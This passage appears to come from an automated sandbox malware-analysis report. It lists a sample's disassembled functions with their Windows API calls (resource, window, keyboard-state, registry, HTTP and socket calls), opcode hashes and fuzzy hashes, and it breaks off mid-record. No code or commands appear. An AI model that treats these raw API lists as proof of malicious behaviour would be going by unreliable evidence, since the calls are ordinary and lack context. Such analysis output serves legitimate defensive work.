                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    • Opcode ID: 037d0d38554d50ad376582204ed98b53cdebbb63cc0d02ce814076cdc0b341de
                                                    • Instruction ID: a904a5e2b2101c6edd7b0f072bab89aa0da9cb368ff11f1195ce22352f82f7fa
                                                    • Opcode Fuzzy Hash: 037d0d38554d50ad376582204ed98b53cdebbb63cc0d02ce814076cdc0b341de
                                                    • Instruction Fuzzy Hash: 65414D39508684AEC73B8B3DDD9CF7B3B55AF46310F16882DE147C2960CA75AC45C724
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424189, Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004241D4
                                                    • LoadResource.KERNEL32(?,00000000), ref: 004241E0
                                                    • LockResource.KERNEL32(00000000), ref: 004241ED
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0042420D
                                                    • LoadResource.KERNEL32(?,00000000), ref: 0042421F
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0042422E
                                                    • LockResource.KERNEL32(?), ref: 0042423A
                                                    • CreateIconFromResourceEx.USER32 ref: 0042429B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock$CreateFromIconSizeof
                                                    • String ID:
                                                    • API String ID: 2263570339-0
                                                    • Opcode ID: 9e86d8ad74978670dc31799ae0be5fca43cbb38d157dd87e1002075167de16ba
                                                    • Instruction ID: 22da253c79582ee1a19b9f76c76800e257b9d9e49ba468458394bd488a4b82bb
                                                    • Opcode Fuzzy Hash: 9e86d8ad74978670dc31799ae0be5fca43cbb38d157dd87e1002075167de16ba
                                                    • Instruction Fuzzy Hash: CD31CE7560122AABCB019FA1EC48EBF7BACFF45341F4045B6F801D2150D778DA618BB9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00446442, Relevance: 12.1, APIs: 8, Instructions: 101windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteObject.GDI32(?), ref: 0044645A
                                                    • GetDC.USER32(00000000), ref: 00446462
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044646D
                                                    • ReleaseDC.USER32 ref: 00446479
                                                    • CreateFontW.GDI32(000000FF,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,00000000), ref: 004464B5
                                                    • SendMessageW.USER32(00000001,00000030,00000000,00000001), ref: 004464C6
                                                    • MoveWindow.USER32(00000001,?,?,?,?,00000000,?,?,00449299,?,00000002,000000FF,00000000,00000001,000000FF,?), ref: 00446500
                                                    • SendMessageW.USER32(00000001,00000142,00000000,00000000), ref: 00446520
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID:
                                                    • API String ID: 3864802216-0
                                                    • Opcode ID: cf705c3c8557756e7e40020ddcaa2a525f90188a36419592c5b29d1fa4a1d05b
                                                    • Instruction ID: 904e6a75315bb650a568c37f649c4c851f838289dc3ed93257d07603b80302f7
                                                    • Opcode Fuzzy Hash: cf705c3c8557756e7e40020ddcaa2a525f90188a36419592c5b29d1fa4a1d05b
                                                    • Instruction Fuzzy Hash: FE319C76201210BFEB208F50DC8AFEB3F6DEF4A765F054066FE089A195C6799845CB78
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00439E38, Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 371COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 0-572801152
                                                    • Opcode ID: c0cf5e4958c49d2e7332b3adae72302939ed35f425a64491feb1ed94d1b22aab
                                                    • Instruction ID: 1983f0de7853449990863725946a7893f2dd20b024b9408ba150058970f41c10
                                                    • Opcode Fuzzy Hash: c0cf5e4958c49d2e7332b3adae72302939ed35f425a64491feb1ed94d1b22aab
                                                    • Instruction Fuzzy Hash: 72D1C171A4020AAFDF10CFA8D885EEFB7B8FB48314F10852AF945A7280D7789D55CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C1424, Relevance: 10.7, APIs: 7, Instructions: 221COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e11d7613074a9d5f925d46ed18126dac40eae3a2589bf3cc002c3886abcf59c
                                                    • Instruction ID: 78942fc83b1772d375587bf9c063d3e39bde9d13f63dc8ba4fa303d310982362
                                                    • Opcode Fuzzy Hash: 0e11d7613074a9d5f925d46ed18126dac40eae3a2589bf3cc002c3886abcf59c
                                                    • Instruction Fuzzy Hash: 5D818B74900109EFCB06CF99CC49EBEBB78FF86314F118159F915AA252C734AE11DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044B60B, Relevance: 10.7, APIs: 7, Instructions: 201windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindow.USER32(00F784A8), ref: 0044B6A5
                                                    • IsWindowEnabled.USER32(00F784A8), ref: 0044B6B1
                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0044B795
                                                    • SendMessageW.USER32(00F784A8,000000B0,?,?), ref: 0044B7CC
                                                    • IsDlgButtonChecked.USER32(?,?), ref: 0044B809
                                                    • GetWindowLongW.USER32(00F784A8,000000EC), ref: 0044B82B
                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0044B843
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                    • String ID:
                                                    • API String ID: 4072528602-0
                                                    • Opcode ID: 355fb09ae33575a824e7fc8bf8942af6f225ea96f24e05530f412ca6ec20d3b5
                                                    • Instruction ID: 6f7fd31dffa67334b5d95cdfcecc7064c146713ce217315643e3fc4da8127952
                                                    • Opcode Fuzzy Hash: 355fb09ae33575a824e7fc8bf8942af6f225ea96f24e05530f412ca6ec20d3b5
                                                    • Instruction Fuzzy Hash: BD71BF34600204AFFB20AF64C894FBA7BB9FB4A340F16446BF94597361C739E941CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00421276, Relevance: 10.7, APIs: 7, Instructions: 173windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 004212B5
                                                    • GetKeyboardState.USER32(?,?,?,?), ref: 004212CA
                                                    • SetKeyboardState.USER32(?,?,?,?), ref: 0042132B
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00421357
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00421374
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004213B8
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004213D9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 1eeb8c4f8abad87c64b0c37bdbd25c5cc7025b9221a4137c510fda040500f8c7
                                                    • Instruction ID: a8f9a4ce503ffcffd597937c3af1dcde932911c82df6b94081d2c0554a391ddd
                                                    • Opcode Fuzzy Hash: 1eeb8c4f8abad87c64b0c37bdbd25c5cc7025b9221a4137c510fda040500f8c7
                                                    • Instruction Fuzzy Hash: D35104A07043E53CFB328325AC05B777FA99B16304F48449BF1D895DE2D3A9E888D768
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042145D, Relevance: 10.7, APIs: 7, Instructions: 173windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(?), ref: 0042149C
                                                    • GetKeyboardState.USER32(?), ref: 004214B1
                                                    • SetKeyboardState.USER32(?), ref: 00421512
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00421540
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0042155F
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 004215A5
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004215C8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 32b98405ce8d3a1c2fc87da1b1fc0f73627925bc8c34d37874cfc31244cf62f4
                                                    • Instruction ID: dc3608461005af5fab71c25aa07448635399053d8771977762efaa007ba1fa1a
                                                    • Opcode Fuzzy Hash: 32b98405ce8d3a1c2fc87da1b1fc0f73627925bc8c34d37874cfc31244cf62f4
                                                    • Instruction Fuzzy Hash: 4751F5A07047E53DFB324634AC05BB77FA85B56304F48448BF1C5959E2C2ADE8C4D768
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00446FEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 146windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00447093
                                                    • SendMessageW.USER32(?,00001036,?,?), ref: 004470A7
                                                    • SetWindowPos.USER32(?,?,?,?,?,?,00000013,?,?,?,?,003FCEBD,?,?,?,?), ref: 004470C1
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00447133
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00447161
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysListView32
                                                    • API String ID: 2326795674-78025650
                                                    • Opcode ID: fd50c7829cf02e8d9650a5639bb2a7a349cc174c2b48b552c2b8409e0f31d473
                                                    • Instruction ID: b492e2c37e0be72966df176ebaa19890419c7d66a91f81fde3dfad2d70fc75d4
                                                    • Opcode Fuzzy Hash: fd50c7829cf02e8d9650a5639bb2a7a349cc174c2b48b552c2b8409e0f31d473
                                                    • Instruction Fuzzy Hash: D241D571A04308AFEB219F64CC85FEF77A8EF08354F10052BF544E6291C7769D858B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00431D09, Relevance: 10.6, APIs: 7, Instructions: 141networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00431D44
                                                    • HttpOpenRequestW.WININET(00000000,?,?,?,?,?,?), ref: 00431D70
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00000003), ref: 00431DB2
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00431DC7
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00431DD4
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00000003,00000000), ref: 00431E04
                                                    • InternetCloseHandle.WININET(00000000), ref: 00431E4B
                                                      • Part of subcall function 00432777: GetLastError.KERNEL32(?,?,00431B0B,00000000,00000000,00000001), ref: 0043278C
                                                      • Part of subcall function 00432777: SetEvent.KERNEL32(?,?,00431B0B,00000000,00000000,00000001), ref: 004327A1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                    • String ID:
                                                    • API String ID: 2603140658-0
                                                    • Opcode ID: 62c62db8eaa6932d6f5f5e4c796cced17ca90008b96b5b3ee8cc7537a4829313
                                                    • Instruction ID: a345d17bd385cf8370cee934b340136d550ce726bf33db1d10bababaf2c29d09
                                                    • Opcode Fuzzy Hash: 62c62db8eaa6932d6f5f5e4c796cced17ca90008b96b5b3ee8cc7537a4829313
                                                    • Instruction Fuzzy Hash: 6B4180B5500208BEEB129F50CC89FFB3B6CFF09754F00512BFA059A150D7799E458BA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041DA5D, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 131comlibraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoCreateInstance.OLE32(00000018,00452C2C,00000005,00000028,?,?,00000001,?,?,00000000,00000000,00000000,?,00438639,?,00000000), ref: 0041DAC5
                                                    • SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,00438639,?,00000000,00000000), ref: 0041DAFB
                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0041DB0C
                                                    • SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,00438639,?,00000000,00000000), ref: 0041DB8E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                    • String ID: ,,E$DllGetClassObject
                                                    • API String ID: 753597075-2224467221
                                                    • Opcode ID: a40bd937c221ef3720cf6b9d5a83b7323504fafb0a175a640a60be797441ac43
                                                    • Instruction ID: a091a159d7ba4ed06512e3704a3883e3911a94892330c574ad843ed744d82b9d
                                                    • Opcode Fuzzy Hash: a40bd937c221ef3720cf6b9d5a83b7323504fafb0a175a640a60be797441ac43
                                                    • Instruction Fuzzy Hash: 0F41C1F2904208EFDB14CF54CC85ADB7BA9EF45354F1181ABF9059E106D7B9EA80CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004473C1, Relevance: 10.6, APIs: 7, Instructions: 106windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateMenu.USER32 ref: 004473F4
                                                    • SetMenu.USER32(?,00000000), ref: 00447403
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00447490
                                                    • IsMenu.USER32 ref: 004474A6
                                                    • CreatePopupMenu.USER32 ref: 004474B0
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004474DD
                                                    • DrawMenuBar.USER32 ref: 004474E5
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                    • String ID:
                                                    • API String ID: 161812096-0
                                                    • Opcode ID: 2e2117f7811886ad27d96b892c9a8cccc51c3382380d034b39ce61bcb6c187dd
                                                    • Instruction ID: 177e3fe6f71d3a8b536e8f6575c259c302711ccce950dff018645de0689c083c
                                                    • Opcode Fuzzy Hash: 2e2117f7811886ad27d96b892c9a8cccc51c3382380d034b39ce61bcb6c187dd
                                                    • Instruction Fuzzy Hash: 38419C79A01204EFEB10DF64D844EAABBF5FF09350F14042AF945A7350C735A914CF58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044122D, Relevance: 10.6, APIs: 7, Instructions: 105registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,?,?,000000FF,?,?,?,?,?,?), ref: 0044125C
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441286
                                                    • FreeLibrary.KERNEL32(00000000), ref: 0044133D
                                                      • Part of subcall function 0044122D: RegCloseKey.ADVAPI32(?), ref: 004412A3
                                                      • Part of subcall function 0044122D: FreeLibrary.KERNEL32(?), ref: 004412F5
                                                      • Part of subcall function 0044122D: RegEnumKeyExW.ADVAPI32(?,?,?,000000FF,?,?,?,?), ref: 00441318
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 004412E0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: b54c5111866a77886088dd581791c2f6ce3ff9c25984777772ed8e42e97809e2
                                                    • Instruction ID: 82250273116289216a8f2e1aa33bdd4fffbcdea268fae70cf4f0beb909677be8
                                                    • Opcode Fuzzy Hash: b54c5111866a77886088dd581791c2f6ce3ff9c25984777772ed8e42e97809e2
                                                    • Instruction Fuzzy Hash: 5E314DB5901119BFEB14DFD0DD89EFFB77CEB09304F00016AE501E2550D6795E899AA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041DFDC, Relevance: 10.6, APIs: 7, Instructions: 104memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,?,00000000), ref: 0041E01F
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041E045
                                                    • SysAllocString.OLEAUT32(00000000), ref: 0041E048
                                                    • SysAllocString.OLEAUT32(?), ref: 0041E066
                                                    • SysFreeString.OLEAUT32(?), ref: 0041E06F
                                                    • StringFromGUID2.OLE32(?,?,00000028,00000000,?,00000000), ref: 0041E094
                                                    • SysAllocString.OLEAUT32(?), ref: 0041E0A2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: e2edd244b0058afa859663ec7e92170d962b94d17e00ce1e316a25be14e9e427
                                                    • Instruction ID: 381df3ba13b2094b962b7f8b6fe77641459e572cb0cda0bb489a897679509e9d
                                                    • Opcode Fuzzy Hash: e2edd244b0058afa859663ec7e92170d962b94d17e00ce1e316a25be14e9e427
                                                    • Instruction Fuzzy Hash: 4E21B77A50412DBEEB10DBA9DC48CFB3BACEB053747104126F959DB190C6759C858774
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044653C, Relevance: 10.6, APIs: 7, Instructions: 101windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044655B
                                                    • GetWindowLongW.USER32(00F784A8,000000F0), ref: 0044658E
                                                    • GetWindowLongW.USER32(00F784A8,000000F0), ref: 004465C3
                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 004465F5
                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0044661F
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00446630
                                                    • SetWindowLongW.USER32 ref: 0044664A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID:
                                                    • API String ID: 2178440468-0
                                                    • Opcode ID: ee51dd6738b21220ce64e91f476e98213085fbd2a6c2a2a7489fe51697676f80
                                                    • Instruction ID: 0e4ca0423d05e5e2e7a961631c76f9f759acfe0ecbfd6924a85ec9946ac421fe
                                                    • Opcode Fuzzy Hash: ee51dd6738b21220ce64e91f476e98213085fbd2a6c2a2a7489fe51697676f80
                                                    • Instruction Fuzzy Hash: 86311335605110AFEB20DF18EC84F5A3BE1FB4A354F1601BAF5058B2B9CB36A844DB5A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E0B5, Relevance: 10.6, APIs: 7, Instructions: 98memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,00000008), ref: 0041E0FA
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041E120
                                                    • SysAllocString.OLEAUT32(00000000), ref: 0041E123
                                                    • SysAllocString.OLEAUT32(?), ref: 0041E144
                                                    • SysFreeString.OLEAUT32(?), ref: 0041E14D
                                                    • StringFromGUID2.OLE32(?,?,00000028,?,00000008), ref: 0041E167
                                                    • SysAllocString.OLEAUT32(?), ref: 0041E175
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: b360f8353534ce4a587e749d5a061165c02b458d0b50633a91c166d6ae3b74ae
                                                    • Instruction ID: d68e61f1469251881f9f2efa35c369220c41d03927a9feb27a829daa8185ed3d
                                                    • Opcode Fuzzy Hash: b360f8353534ce4a587e749d5a061165c02b458d0b50633a91c166d6ae3b74ae
                                                    • Instruction Fuzzy Hash: AC21777A504118BFEB109FA9DC89CFB7BACEB067707508126F955CB1A0DA359C81CB78
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00436486, Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004380A0: inet_addr.WSOCK32(?,?,?,?,?,?,00000000), ref: 004380CB
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004364D9
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004364E8
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00436521
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 0043652A
                                                    • WSAGetLastError.WSOCK32 ref: 00436534
                                                    • closesocket.WSOCK32(00000000), ref: 0043655D
